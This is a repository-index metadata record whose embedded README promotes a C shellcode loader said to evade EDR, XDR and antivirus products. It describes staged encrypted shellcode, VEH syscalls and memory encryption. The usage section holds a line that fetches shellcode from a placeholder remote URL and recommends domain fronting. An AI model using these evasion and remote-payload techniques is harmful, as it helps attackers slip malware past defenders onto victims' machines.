{"id":23421550,"url":"https://github.com/evilbytecode/edr-xdr-av-bypass-shellcode-loader","last_synced_at":"2025-10-30T07:31:01.300Z","repository":{"id":268281949,"uuid":"903853240","full_name":"EvilBytecode/EDR-XDR-AV-Bypass-Shellcode-Loader","owner":"EvilBytecode","description":"Bypassing Major EDR's with staged shellcode, custom getmodulehandleW and getprocaddress, veh syscalls \u0026 more.","archived":false,"fork":false,"pushed_at":"2025-02-07T17:44:33.000Z","size":18,"stargazers_count":9,"open_issues_count":0,"forks_count":3,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-02-07T18:33:31.601Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/EvilBytecode.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-12-15T18:10:57.000Z","updated_at":"2025-02-07T17:44:36.000Z","dependencies_parsed_at":"2024-12-15T19:33:12.522Z","dependency_job_id":"30255f44-5ea4-48a2-87a6-237b6a40ff69","html_url":"https://github.com/EvilBytecode/EDR-XDR-AV-Bypass-Shellcode-Loader","commit_stats":null,"previous_names":["evilbytecode/edr-xdr-av-bypass-shellcode-loader"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/EvilBytecode%2FEDR-XDR-AV-Bypass-Shellcode-Loader","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/EvilBytecode%2FEDR-XDR-AV-Bypass-Shellcode-Loader/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/EvilBytecode%2FEDR-XDR-AV-Bypass-Shellcode-Loader/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/EvilBytecode%2FEDR-XDR-AV-Bypass-Shellcode-Loader/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/EvilBytecode","download_url":"https://codeload.github.com/EvilBytecode/EDR-XDR-AV-Bypass-Shellcode-Loader/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":238941490,"owners_count":19556008,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-12-23T02:16:01.203Z","updated_at":"2025-10-30T07:31:01.289Z","avatar_url":"https://github.com/EvilBytecode.png","language":"C","readme":"# EDR-XDR-AV-Bypass-Shellcode-Loader\n- CURRENTLY BYPASSES CROWDSTRIKE \u0026 SENTINEL ONE RUNTIME.\n- SCROLL DOWN TO FIND DETECTIONS (RUNTIME \u0026 STATIC TIME ANALYSIS)\n---\n![image](https://github.com/user-attachments/assets/c9945d69-547c-4c21-923a-20325c886844)\n\n## Overview\nThis project provides an advanced shellcode loader capable of bypassing major EDRs (Endpoint Detection and Response), XDRs, and AV (Antivirus) systems. The shellcode is executed in a staged manner with techniques such as memory protection manipulation, VEH (Vectored Exception Handling), and system calls to evade detection.\n\n## Features\n- **Staged Shellcode Execution**: Downloads and executes shellcode in multiple steps to minimize detection.\n- **Custom Memory Protection**: Evading modern AntiVirus memory scanners by encrypting a function during runtime, then decrypting it when the function needs to be executed, then re-encrypting the function once the function has finished executing\n- **Vectored Exception Handling (VEH)**: Handles memory access violations and redirects execution flow.\n- **Encrypted Shellcode**: Shellcode is encrypted during download and decrypted in-memory before execution.\n- Custom ```GetProcessAddress``` \u0026 ```GetModuleHandleW```\n## Prerequisites\n- Windows Operating System (x64)\n- Visual Studio or compatible C++ compiler\n- Internet connection (for staged shellcode download)\n\n## Usage\n\n### Build\n1. Clone the repository:\n2. Open the project in Visual Studio or your preferred C++ environment (i use vsc).\n3. Compile the project in Release mode for a production-ready executable.\n\n### Execution\n1. Host the shellcode binary on a remote server (e.g., Discord, AWS, or any public URL, works best with domain fronting).\n2. Update the shellcode URL in the `main` function:\n   ```cpp\n   std::wstring url = L\"https://your-hosted-url/shellcode.bin\";\n   ```\n3. Run the executable:\n   ```bash\n   hack.exe\n   ```\n\n## DETECTIONS (scanner.to / kleenscan)\n![image](https://github.com/user-attachments/assets/0afe46a9-9aa7-450c-9ec1-85e898ae4487)\n![image](https://github.com/user-attachments/assets/b8d4a182-e35e-46f0-a052-04e488674069)\n![image](https://github.com/user-attachments/assets/0a3b4308-014e-4dc3-ae99-6faf52b77fc6)\n\n## Disclaimer\nThis tool is intended for educational and research purposes only. Misuse of this tool for malicious purposes is strictly prohibited and against the law. The author does not condone or support any illegal activity.\n\n\n# Refernces that might help you: \n- https://redops.at/en/blog/syscalls-via-vectored-exception-handling#:~:text=What%20is%20meant%20by%20syscalls%20via%20vectored%20exception,a%20VEH%20function%20and%20deliberately%20throwing%20an%20exception.\n- https://whiteknightlabs.com/2024/07/31/layeredsyscall-abusing-veh-to-bypass-edrs/\n- https://github.com/C5Hackr/Segment-Encryption\n- https://revers.engineering/custom-getprocaddress-and-getmodulehandle-implementation-x64/\n\n\n## License\nThis project is licensed under the MIT License. See the LICENSE file for details.","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fevilbytecode%2Fedr-xdr-av-bypass-shellcode-loader","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fevilbytecode%2Fedr-xdr-av-bypass-shellcode-loader","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fevilbytecode%2Fedr-xdr-av-bypass-shellcode-loader/lists"}